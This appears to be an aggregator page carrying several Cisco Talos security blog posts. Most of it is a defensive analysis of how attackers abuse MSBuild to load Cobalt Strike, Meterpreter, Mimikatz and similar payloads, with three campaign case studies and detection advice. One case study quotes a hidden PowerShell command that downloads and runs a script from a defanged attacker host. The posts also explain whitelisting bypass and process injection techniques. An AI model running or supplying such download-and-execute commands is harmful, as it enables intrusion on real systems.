                %ProgramData%\Microsoft\OfficeSoftwareProtectionPlatform\Cache\_45-INSTRUCTION.html7
                %ProgramData%\Microsoft\OfficeSoftwareProtectionPlatform\_48-INSTRUCTION.html7
                %ProgramData%\Microsoft\RAC\PublishedData\_44-INSTRUCTION.html7
                %ProgramData%\Microsoft\RAC\StateData\_41-INSTRUCTION.html7
                %ProgramData%\Microsoft\User Account Pictures\Default Pictures\_33-INSTRUCTION.html7
                %ProgramData%\Microsoft\User Account Pictures\_34-INSTRUCTION.html7
                *See JSON for more IOCs

                File Hashes

                0670326e0572ca61e6a1f9b654088f5ac91fd3426dcba932377c801763fe5906 085198d732095e24f5165d61636930cb1012b833278d86565a66d23dd0ffce96 14f9231bd987060133bc1e2908a9a5691e829d6f2cc43010f943e4070b0102cf 2f5776b368011a76db2c690252846d0e3a90ccd27d9575e015663cebaf58db23 5815f647ad348de649c3ebfb5f1987e305410855cc944d14b1284abaaa40d9e3 593ead1c717d2ca3ed32fa98da70f4df7e0a99431d0327fc08c363621afc1fbe a515545e6056e1a9f75a4f7d0afefb54bf7e1ffb1e5f7f6641cece38db7e6cf0 bebd3b1683b69a383af7689f70ad3e3992630e0fc07d98e2e014f4978136722a c11b9d1ba0badcc063eb6e60894b7f4f0932e4f73d037f05e06c80d72833b328 c4cfc1a33b5e956376c773674c1a8baa318832f2d75fac9efe53fbc895ace7da cb73396e304937a404c63ad696c6e2d269f38d8082d636e2c16e550f1f7cb118 cd8b407e19e2d93dfc939cd04e3a43100d2442128f42c226ac1dedeba0da4824 d2377ff809d7d65898523f10b38331edf20c11547776894343e926f6bddf1e39 d6e35e20d5b7fa3d0b5352b4953701cabb4ed2a83d94dc666ef9900b7c53394a d851e224dd46fbf74960d57bf29f8b60157e9b697e5132d5e97abe504f6038a2 d9ddfa571587bd55c75526b8f17e6dbbb8a4b6179bfc002575cdcbf446154e7a fd1e8a916fa218df73894c59784dc94cbd26c7c7a5e1c1ee37ce45b349e4cc2c

                Coverage

                ProductProtection
                AMPThis has coverage
                Cloudlock N/A
                CWSThis has coverage
                Email SecurityThis has coverage
                Network SecurityThis has coverage
                Stealthwatch N/A
                Stealthwatch Cloud N/A
                Threat GridThis has coverage
                UmbrellaThis has coverage
                WSAThis has coverage

                Screenshots of Detection

                AMP


                ThreatGrid


                Umbrella


                Malware




                Exploit Prevention

                Cisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities.
                CVE-2019-0708 detected - (4662)
                An attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a heap memory corruption which can be triggered by sending a specially crafted Remote Desktop Protocol (RDP) request. Since this vulnerability can be triggered without authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction.
                Excessively long PowerShell command detected - (749)
                A PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats.
                Kovter injection detected - (319)
                A process was injected into, most likely by an existing Kovter infection. Kovter is a click fraud Trojan that can also act as an information stealer. Kovter is also file-less malware meaning the malicious DLL is stored inside Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns.
                Process hollowing detected - (206)
                Process hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead.
                Gamarue malware detected - (188)
                Gamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system.
                Atom Bombing code injection technique detected - (133)
                A process created a suspicious Atom, which is indicative of a known process injection technique called Atom Bombing. Atoms are Windows identifiers that associate a string with a 16-bit integer. These Atoms are accessible across processes when placed in the global Atom table. Malware exploits this by placing shell code as a global Atom, then accessing it through an Asynchronous Process Call (APC). A target process runs the APC function, which loads and runs the shellcode. The malware family Dridex is known to use Atom Bombing, but other threats may leverage it as well.
                Installcore adware detected - (105)
                Install core is an installer which bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that display advertising in the form of popups or by injecting into browsers and adding or altering advertisements on webpages. Adware is known to sometimes download and install malware.
                Dealply adware detected - (75)
                DealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware.
                Reverse http payload detected - (30)
                An exploit payload intended to connect back to an attacker controlled host using http has been detected.
                Corebot malware detected - (20)
                Corebot is a Trojan with many capabilities found in other prominent families. It features a plugin system to enable it to load a variety of features from the C&C server at any time. Known plugins include RAT capabilities such as taking desktop screenshots, as well as being able to intercept and modify browser communications and steal data, especially data related to banking.

                Beers with Talos Ep. #72: Getting to Patch Day - Understanding Vulnerability Risks and Options

                $
                0
                0

                Beers with Talos (BWT) Podcast episode No. 72 is now available. Download this episode and subscribe to Beers with Talos:

                If iTunes and Google Play aren't your thing, click here.

                Recorded Jan. 31, 2020

                When a vulnerability is released, regardless if it has a website and logo or not, we need to understand the risk to the network and what defense options are possible before the patch is ready for production. Can you defend against the vulnerability or do you go straight for known exploits? What happens if an exploit occurs? Also discussed: Talos begins releasing Threat Assessment Reports based on IR engagement data and known prevalent threats. Snort has a new series of training and lab video available for Snort 2 and Snort3.

                The timeline:

                • 01:00 – Roundtable: It’s really more of a pirate parlay this go round
                • 08:30 – What Grinds my Gears with Craig: Vendor reports without filters and context
                • 12:50 – Addressing vulnerabilities: Understand the risk and assess your options pre-patch
                • 29:00 – Talos Threat Assessment Reports (TAR): Looking at IR Trends from the last quarter
                • 35:45 – New Snort 2 and Snort 3 training videos
                • 39:25 – Closing thoughts and parting shots

                Links and resources:

                ==========

                Featuring: Craig Williams (@Security_Craig), Joel Esler (@JoelEsler), Matt Olney (@kpyke) and Nigel Houghton (@EnglishLFC). Hosted by Mitch Neff (@MitchNeff)

                Subscribe via iTunes (and leave a review!)


                Subscribe to the Threat Source newsletter


                Give us your feedback and suggestions for topics: beerswithtalos@cisco.com

                Building a bypass with MSBuild

                $
                0
                0



                NEWS SUMMARY


                • Living-off-the-land binaries (LoLBins) continue to pose a risk to security defenders.
                • We analyze the usage of the Microsoft Build Engine by attackers and red team personnel.
                • These threats demonstrate techniques T1127 (Trusted Developer Utilities) and T1500 (Compile After Delivery) of MITRE ATT&CK framework.


                In one of our previous posts, we discussed the usage of default operating system functionality and other legitimate executables to execute the so-called "living-off-the-land" approach to the post-compromise phase of an attack. We called those binaries LoLBins. Since then, Cisco Talos has analyzed telemetry we received from Cisco products and attempted to measure the usage of LoLBins in real-world attacks.

                Specifically, we are going to focus on MSBuild as a platform for post-exploitation activities. For that, we are collecting information from open and closed data repositories as well as the behavior of samples submitted for analysis to the Cisco Threat Grid platform.

                What's new?


                We collected malicious MSBuild project configuration files and documented their structure, observed infection vectors and final payloads. We also discuss potential actors behind the discovered threats.

                How did it work?


                MSBuild is part of the Microsoft Build Engine, a software build system that builds applications as specified in its XML input file. The input file is usually created with Microsoft Visual Studio. However, Visual Studio is not required when building applications, as some .NET framework and other compilers that are required for compilation are already present on the system.

                The attackers take advantage of MSBuild characteristics that allow them to include malicious source code within the MSBuild configuration or project file.

                So What?


                Attackers see a few benefits when using the MSBuild engine to include malware in a source code format. This technique was discovered a few years ago and is well-documented by Casey Smith, whose proof of concept template is often used in the samples we collected.

                • First of all, this technique can be used to bypass application whitelisting technologies such as Windows Applocker.
                • Another benefit is that the code is compiled in memory so that no permanent files exist on the disk, which would otherwise raise a level of suspicion by the defenders.
                • Finally, the attackers can employ various methods to obfuscate the payload, such as randomizing variable names or encrypting the payload with a key hosted on a remote site, which makes detection using traditional methods more challenging.




                Technical case overview


                One of the characteristics of MSBuild input configuration files is that the developer can include a special XML tag that specifies an inline task, containing source code that will be compiled and loaded by MSBuild in memory.

                Definition of inline task within the MSBuild configuration file.

                Depending on the attributes of the task, the developer can specify a new class, a method or a code fragment that automatically gets executed when a project is built.

                The source code can be specified as an external file on a drive. Decoupling the project file and the malicious source code may make the detection of malicious MSBuild executions even more challenging.

                During the course of our research, we collected over 100 potentially malicious MSBuild configuration files from various sources, we analyzed delivery methods and investigated final payloads, usually delivered as a position-independent code, better known as shellcode.

                Summary analysis of shellcode

                Metasploit
                The majority of the collected samples contained a variant of Metasploit Meterpreter stager shellcode, generated by the msfvenom utility in a format suitable for embedding in a C# variable. The shellcode is often obfuscated by compressing the byte array with either zlib or GZip and then converting it into base64-encoded printable text.

                Meterpreter stager shellcode example in an MSBuild configuration file.

                Possibly the most convenient tool for quick shellcode analysis is shellcode debugger: scdbg. Scdbg has many options to debug shellcode. Scdbg is based on an open-source x86 emulation library libemu, so it only emulates the Windows environment and will not correctly analyze every shellcode. Nevertheless, the tool is an excellent first stop for analyzing a larger number of shellcode samples as it can produce log files that can later be used in clustering.

                Of course, to analyze shellcode, we need to convert it from the format suitable for assignment to a C# byte array variable back into the binary format. If you regularly use a Unix-based computer with an appropriate terminal/shell, your first port of call may be a default utility xxd, which is more commonly used to dump the content of a binary file in a human-readable hexadecimal format.

                However, xxd also has a reverting mode and it can be used to convert the C# array bytes back into the binary file, using command-line options -r and -p together.

                xxd -r -p input_text_shellcode_file output_binary_shellcode_file

                Xxd supports several popular dumping formats, but it won't always produce the correct output. It is important to check that the binary bytes and the bytes specified in the shellcode text file are the same.

                Scdgb API trace of a Metasploit stager shellcode.

                There is a compiled version of scdbg available, but it is probably better to compile it from the source code because of the new API emulations.

                Covenant

                Covenant is a relatively new C#-based command and control framework that also allows an attacker (or a red team member) to create payloads based on several infection vectors, including MSBuild. The skeleton code for the MSBuild loader is relatively simple and it takes a binary payload, deflates it using zlib decompression and loads it in the MSBuild process space.

                The payload needs to be a .NET assembly which can be loaded and executed by the skeleton code. The Covenant framework has its own post-exploitation set of implants called Grunts. Grunts provide infrastructure for building communications with C2 servers. The tasks are sent to the infected system in a format of obfuscated C# assemblies which get loaded and executed by Grunts.

                Covenant skeleton code loading a Grunt implant.

                NPS — not Powershell — in MSBuild

                NPS is a simple wrapper executable utility created to load the System.Management.Automation and few other .NET assemblies into the process space of an executable. The idea behind it is an attempt to evade the detection of the execution of powershell.exe and still run custom PowerShell code.

                This idea is used by the developers of nps_payload tool which allows actors to create not-PowerShell payloads using different mechanisms, including the MSBuild configuration tool. The tool generates MSBuild project files with a choice of Meterpreter stagers shellcode payloads or a custom Powershell code payload supplied by the user.

                MSBuild non-PowerShell flow.

                Cobalt strike
                Although a Metasploit shellcode MSBuild payload is by far the most common, we have also seen several samples that use a Cobalt Strike beacon as a payload. The beacon shellcode has a structure similar to a PE file but it is designed to be manually loaded in memory and executed by invoking the shellcode loader that starts at the beginning of the blob, immediately before MZ magic bytes.

                Cobalt Strike payload beginning.


                Cobalt Strike reflective loader.

                The payload itself is over 200 KB long, so it is relatively easy to recognize. One of the case studies later in this post covers a more serious attempt to obfuscate the beacon payload by encrypting it with AES256 using a key hosted on a remote website.
                Mimikatz
                The only discovered payload that is longer than a Cobalt Strike shellcode/beacon is a sample containing two Mimikatz payloads. A sample we discovered has a more complex logic for loading the executable into memory and eventually launching it with a call to CreateThread. The PE loader's source is available on GitHub, although for this sample, it was somewhat adopted to work within MSBuild.

                MSBuild Mimikatz loader

                The loader first checks if the operating system is 32 or 64 bit and then loads and runs the appropriate Mimikatz executable stored in a variable encoded using base64.

                Case studies

                We follow our general observations with three case studies discovered by searching the submissions in the Cisco Threat Grid platform over the period of the last 6 months. Samples attempting to abuse MSBuild are detected by Threat Grid using the indicator "MSBuild Process Builds with Project File (xml/csproj)". This indicator name can also be used to search for additional samples attempting to use the same technique.

                Brief Cisco Threat Grid explanation of the MSBuild-related indicator of compromise.

                Case 1: Word document to MSBuild payload on Dropbox


                Our first case study of an actual campaign using MSBuild to deploy a payload is a Word document that displays a fairly common fake message prompting the user to "enable content" to execute a VBA macro code included in the document.

                Once enabled, the VBA code creates two files in the user's Temp folder. The first one is called "expenses.xlsx" and it is actually an MSBuild configuration XML file containing malicious code to compile and launch a payload.

                According to VirusTotal, the sample was hosted on a publicly accessible Dropbox folder with the file name "Candidate Resume - Morgan Stanley 202019.doc," which indicates that the campaign was targeted or that the actor is conducting a red team exercise to attempt to sneak by a company's defenses.

                Sample when opened.

                The second file created by the VBA code in the user's temporary folder is called "resume.doc." This is a clean decoy Word document that displays a simple resume for the position of a marketing manager.

                The decoy clean document.

                Winword launches MSBuild, which starts the C# compilers csc.exe and cvtres.exe.


                Threat Grid process tree execution of the sample.

                We can also see the MSBuild process launching Internet Explorer (iexplore.exe). iexplore.exe is launched in a suspended mode so that the payload, which is a Cobalt strike beacon, can be copied into its process space and launched by queuing the thread as an asynchronous procedure call, one of the common techniques of process injection.

                Blue teams should regularly investigate parent-child relationships between processes. In this case, seeing winword.exe launching the MSBuild.exe process and MSBuild.exe launching iexplore.exe is highly unusual.

                MSBuild-based process injection source code.

                Case 2: Excel file to Silent Trinity


                The second case study has a similar pattern to the previous one. Here, we have an Excel file that looks like it contains confidential salary information but prompts the user to enable editing to see the content.

                Excel sample when opened

                The Excel file contains a VBA macro code that does not look very suspicious at first glance but actually calls to another function. This function also starts out rather innocuously, but eventually ends with a suspicious call to Wscript.Shell using a document Subject attribute containing a URL of the next loader stage.


                VBA Code using the Subject attribute of the document to launch the next stage.

                The document subject property contains the code to execute PowerShell and fetch and invoke the next stage:

                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoExit -w hidden -Command iex(New-Object System.Net.WebClient).DownloadString('hxxp://apb[.]sh/helloworld[.]ps1')

                Helloworld.ps1 downloads the MSBuild configuration from another URL, hxxp://apb[.]sh/msbuild[.]xml and launches it. Finally, Helloworld.ps1 downloads a file from hxxp://apb[.]sh/per[.]txt and saves it as a.bat in the user's \Start Menu\Programs\Startup\ folder. A.bat ensures that the payload persists after users logs-out of the system.

                The downloaded MSBuild configuration file seems to be generated by the Silent Trinity .NET post-exploitation framework. It stores a .NET assembly payload as a file compressed with zlib and then encoded using a base64 encoder. Once decoded, the Silent Trinity stager assembly is loaded with the command and control URL pointing to hxxp://35[.]157[.]14[.]111, and TCP port 8080, an IP address belonging to Amazon AWS range.

                All stages of the Silent Trinity case study.

                Silent Trinity is a relatively recent framework that enables actors and members of red teams to conduct various activities after the initial foothold is established. An original Silent Trinity implant is called Naga and has an ability to interpret commands sent in the Boolang language. The communication between the implant and the C2 server is encrypted even if the data is sent over HTTP.

                In this case, the actors are using an older version of Naga, which does not use Boolang, but it attempts to load IronPython, implementation of Python for .NET framework.

                Silent Trinity implant loading IronPython engine.

                Like with any post-exploitation framework, it is difficult to make a decision if this campaign is truly malicious or it was conducted by a red team member.

                Case 3: URL to encrypted Cobalt Strike beacon


                Our final case study has a different infection chain. It starts with a web page hosting an alleged code of conduct document for employees of a known apparel manufacturer G-III. The document is an HTML application written in VB Script that creates an MSBuild configuration file and runs MSBuild.

                VB Script HTA file creating a configuration file and invoking MSBuild.

                The MSBuild configuration file contains an inline task class that uses an external URL to retrieve the key to decrypt the encrypted embedded payload. The key was stored in the URL hxxp://makeonlineform[.]com/forms/228929[.]txt. The embedded payload is a Cobalt Strike Powershell loader which deobfuscates the final Cobalt Strike beacon and loads it into the process memory.

                Deobfuscated Cobalt Strike PowerShell loader.

                Once the Cobalt Strike beacon is loaded, the HTA application navigates the browser to the actual URL of the G-III code of conduct. Finally, the generated MSBuild configuration file is removed from the computer.

                If we look at the process tree in the graph generated by Threat Grid, we see that a potentially suspicious event of MSBuild.exe process launching PowerShell. Mshta.exe does not show up as a parent process of MSBuild.exe, otherwise, this graph would be even more suspicious.

                HTA application process tree as seen in Threat Grid.

                Telemetry and MSBuild, possible actors


                Looking at the MSBuild telemetry in a format of process arguments defenders can take from their systems or from their EDR tools such as Cisco AMP for Endpoints it is not easy to decide if an invocation of MSBuild.exe in their environments is suspicious.

                This stands in contrast with invocations of PowerShell with encoded scripts where the actual code can be investigated by looking at command line arguments.

                We have measured a proportion of systems running AMP for Endpoints using MSBuild over a period of 30 days to get help us decide if any MSBuild event needs to be investigated.

                The proportion of endpoints running MSBuild on a daily basis in January 2020.

                We also looked at the project filenames. This can catch attacks using default project file names but we cannot expect to catch all using this technique as filenames can be arbitrary. Another possible criterion for investigations is the number of arguments used when MSBuild is invoked where invocations with only a single argument, where the argument is a project name, could be considered more suspicious.

                In addition to the number of arguments, the defenders should look at the file path from where MSBuild is running. It is very likely that suspicious MSBuild invocations will be a subset to the invocation of the path C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll, which is generally specified as the build assembly in malicious MSBuild configuration files.

                The final approach within an organization could be to baseline the parent processes of MSBuild within the organization and mark as suspicious any invocations that do not come from the usual processes, such as the Visual Studio development environment and other software building frameworks. When investigating our telemetry through January 2020, we found only 65 unique executables that acted as parent processes on all endpoints protected by AMP for Endpoints. In almost every organization, this number should be lower and easy to manage.

                In all the endpoints sending telemetry to Cisco, there are up to 2 percent of them running MSBuild on a daily basis, which is too much to investigate in any larger organization. However, if we apply the rules for what constitutes a suspicious MSBuild invocation as described above, we come to a much more manageable number of about one in fifty thousand endpoints (0.1 percent of 2 percent).

                The proportion of endpoints with suspect MSBuild calls in Cisco AMP for Endpoints.

                When considering the authors behind discovered samples, it is very difficult to say more without additional context. Certainly, having only MSBuild project files allows us to conduct basic analysis of the source code and their payloads. Only with some behavioral results, such as the ones from Threat Grid, do we begin to see more context and build a clearer picture of how MSBuild is abused.

                In our investigation, most of the payloads used some sort of a post-exploitation agent, such as Meterpreter, Cobalt Strike, Silent Trinity or Covenant. From those, we can either conclude that the actors are interested in gaining a foothold in a company to conduct further malicious activities or that actors are red team members conducting a penetration test to estimate the quality of detection and the function of the target's defending team.

                Conclusion


                MSBuild is an essential tool for software engineers building .NET software projects. However, the ability to include code in MSBuild project files allows malicious actors to abuse it and potentially provide a way to bypass some of the Windows security mechanisms.

                Finally, our research shows that MSBuild is generally not used by commodity malware. Most of the observed cases had a variant of a post-exploitation agent as a final payload. The usage of widely available post-exploitation agents in penetration testing is somewhat questionable as the defenders can be lulled into a false sense of security. If the defenders get used to seeing, for example, Meterpreter, if another Meterpreter agent is detected on their network they may be ignored, even if it is deployed by a real malicious actor.

                Defenders are advised to carefully monitor command-line arguments of process execution and specifically investigate instances where MSBuild parent process is a web browser or a Microsoft Office executable. This kind of behavior is highly suspicious that indicates that defenses have been breached. Once a baseline is set, the suspect MSBuild calls should be easily visible and relatively rare so they do not increase the average team workload.

                In a production environment, where there are no software developers, every execution of MSBuild.exe should be investigated to make sure the usage is legitimate.

                Coverage


                Ways our customers can detect and block this threat are listed below.



                Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors. Exploit Prevention present within AMP is designed to protect customers from unknown attacks such as this automatically.

                Cisco Cloud Web Security (CWS) orWeb Security Appliance (WSA) web scanning prevents access to malicious websites and detects malware used in these attacks.

                Email Security can block malicious emails sent by threat actors as part of their campaign.

                Network Security appliances such as Next-Generation Firewall (NGFW), Next-Generation Intrusion Prevention System (NGIPS),Cisco ISR, andMeraki MX can detect malicious activity associated with this threat.

                AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

                Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.

                Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase onSnort.org.

                IOCs


                SHA256s

                334d4bcdbd645589b3cf37895c79b3b04047020540d7464268b3be4007ad7ab1 - Cobalt Strike MSBuild project
                a4eebe193e726bb8cc2ffbdf345ffde09ab61d69a131aff6dc857b0d01dd3213 - Cobalt Strike payload
                6c9140003e30137b0780d76da8c2e7856ddb4606d7083936598d5be63d4c4c0d - Covenant MSBuild project
                ee34c2fccc7e605487ff8bee2a404bc9fc17b66d4349ea3f93273ef9c5d20d94 - Covenant payload
                aaf43ef0765a5380036c5b337cf21d641b5836ca87b98ad0e5fb4d569977e818 - Mimikatz MSBuild project
                ef7cc405b55f8a86469e6ae32aa59f693e1d243f1207a07912cce299b66ade38 - Mimikatz x86 payload
                abb93130ad3bb829c59b720dd25c05daccbaeac1f1a8f2548457624acae5ba44 - Metasploit Shellcode MSBuild project
                ce6c00e688f9fb4a0c7568546bfd29552a68675a0f18a3d0e11768cd6e3743fd - Meterpreter stager shellcode
                a661f4fa36fbe341e4ec0b762cd0043247e04120208d6902aad51ea9ae92519e - Not Powershell MSBuild project
                18663fccb742c594f30706078c5c1c27351c44df0c7481486aaa9869d7fa95f8 - Word to Cobalt Strike
                35dd34457a2d8c9f60c40217dac91bea0d38e2d0d9a44f59d73fb82197aaa792 - Excel to Silent Trinity

                URLs

                hxxp://apb[.]sh/helloworld[.]ps1
                hxxp://apb[.]sh/msbuild[.]xml
                hxxp://apb[.]sh/per[.]txt
                hxxp://makeonlineform[.]com/f/c3ad6a62-6a0e-4582-ba5e-9ea973c85540/ - HTA to Cobalt Strike URL

                Vulnerability Spotlight: Memory corruption, DoS vulnerabilities in CoTURN

                $
                0
                0

                Aleksandar Nikolic of Cisco Talos discovered this vulnerability. Blog by Jon Munshaw.

                CoTURN contains denial-of-service and memory corruption vulnerabilities in the way its web server parses POST requests. CoTURN is a TURN server implementation that can be used as a general-
                purpose network traffic TURN server and gateway. The software includes a web server for administration purposes, which is where these two vulnerabilities exist.

                In accordance with our coordinated disclosure policy, Cisco Talos worked with CoTURN to ensure that these issues are resolved and that an update is available for affected customers. CoTURN notified Talos that these vulnerabilities were also discovered by Quarkslab.

                Vulnerability details

                CoTURN HTTP Server POST-parsing memory corruption vulnerability (TALOS-2020-0984/CVE-2020-6061)

                An exploitable heap overflow vulnerability exists in the way CoTURN 4.5.1.1 web server parses POST requests. A specially crafted HTTP POST request can lead to information leaks and other misbehavior. An attacker needs to send an HTTPS request to trigger this vulnerability.

                Read the complete vulnerability advisory here for additional information.

                CoTURN HTTP Server POST-parsing denial-of-service vulnerability (TALOS-2020-0985/CVE-2020-6062)

                An exploitable denial-of-service vulnerability exists in the way CoTURN 4.5.1.1 web server parses POST requests. A specially crafted HTTP POST request can lead to server crash and denial of service. An attacker needs to send an HTTP request to trigger this vulnerability.

                Read the complete vulnerability advisory here for additional information.

                Versions tested

                Talos tested and confirmed that this vulnerability affects CoTURN version 4.5.1.1.

                Coverage

                The following SNORTⓇ rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

                Snort Rules: 53044, 53045

                Cisco Talos Incident Response "Stories from the Field" #2: When do lawyers get involved?

                $
                0
                0


                The second video in our "Stories in the Field" series from Cisco Talos Incident Response is here, with Matt Aubert talking about lawyers.

                While getting a general counsel involved may seem like an arduous process for many incident response teams, Matt Aubert argues in this video that in his expereince, it's best to get lawyers involved early on in the recovery process.

                Watch the full video above or over at our YouTube page here. And to learn more about Talos Incident Response, click here.
                Viewing all 1927 articles
                Browse latest View live


                <script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>